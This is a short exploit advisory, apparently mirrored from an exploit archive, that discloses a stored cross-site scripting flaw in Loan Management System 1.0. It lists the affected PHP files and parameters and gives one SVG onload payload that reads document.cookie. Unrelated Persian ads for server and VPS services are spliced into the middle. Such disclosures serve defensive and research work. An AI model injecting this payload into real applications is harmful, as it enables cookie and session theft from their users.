Loan Management System 1.0 Cross Site Scripting

Loan Management System 1.0 Cross Site Scripting
Posted Jul 28, 2022
Authored by saitamang
Loan Management System version 1.0 suffers from a persistent cross site scripting vulnerability.
tags | exploit, xss
SHA-256 | 44b807c10851b4db74cc02ac40db2bbe66fd7376b59011a5c95ab7a8d9bd232b
Download | Favorite | View
# Exploit Title: Loan Management System - Stored XSS on several parameters
# Date: 28/07/2022
# Exploit Author: saitamang
# Vendor Homepage: sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip
# Version: 1.0
# Tested on: Centos 7 apache2 + MySQL

There are several functions and parameter affected as below:

addUser.php
– firstname
– lastname

سرور شما نیاز به مدیریت و پشتیبانی دارد؟h3>

پیکربندی، مانیتورینگ و نگهداری حرفه‌ای سرورهای لینوکسی و ویندوزی.

پردازش داده و زیرساخت نیاز دارید؟

راه‌اندازی و مدیریت زیرساخت‌های داده و سرور.

مشاوره زیرساخت
مدیریت سرور

save_ltype.php
– ltype_name
– ltype_desc

save_borrower.php
– firstname
– middlename
– lastname
– address

The payload use to inject is “/><svg/onload=alert(document.cookie)>

 

نیاز به سرور پایدار دارید؟

ارائه VPS ایران و خارج با منابع اختصاصی.

خرید VPS

نوشته های مشابه

CVE-2026-5513 – Online Scheduling and Appointment Booking System – Bookly

CVE-2026-11624 – Model Context Protocol DNS Rebinding Vulnerability

CVE-2026-1291 – Meow Gallery

CVE-2026-9629 – Canvas